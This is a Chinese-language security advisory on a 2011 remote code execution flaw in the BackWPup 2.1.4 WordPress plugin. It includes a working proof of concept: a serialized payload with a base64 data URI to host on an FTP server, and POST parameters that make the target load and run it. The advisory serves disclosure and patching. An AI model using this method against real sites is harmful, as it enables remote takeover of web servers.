WordPress插件BackWPUp 2.1.4任意代码执行漏洞
发布日期:2011-10-17
更新日期:2011-10-18
受影响系统:WordPress WordPress 2.1.4
描述:
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。
WordPress插件BackWPup 2.1.4在job/wp_export_generate.php的BackWPUpJobTemp POST参数上缺少数据验证,可使攻击者指定FTP资源为输入,造成在Web服务器上执行本地或远程代码。
<*来源:Phil Taylor
链接:
http://seclists.org/bugtraq/2011/Oct/101
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
上传下面内容到公用的FTP服务器并命名为"file.txt.running".
a:2:{s:7:"WORKING";a:1:{s:5:"NONCE";s:3:"123";}s:8:"ABS_PATH";s:25:
"data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=";}
This serialised string creates an array containing:
$infile['WORKING'] = array();
$infile['WORKING']['NONCE'] = '123';
$infile['ABS_PATH'] = 'data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=';
Once uploaded ensure the FTP file is writeable and issue a POST to
"job/wp_export_generate.php" with the following parameters:
$_POST['BackWPupJobTemp'] = "
ftp://user:password () 10 2 0 128/file.txt";
$_POST['nonce'] = '123';
$_POST['type'] = 'getxmlexport';
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://wordpress.org/浏览次数:4234
严重程度:0(网友投票)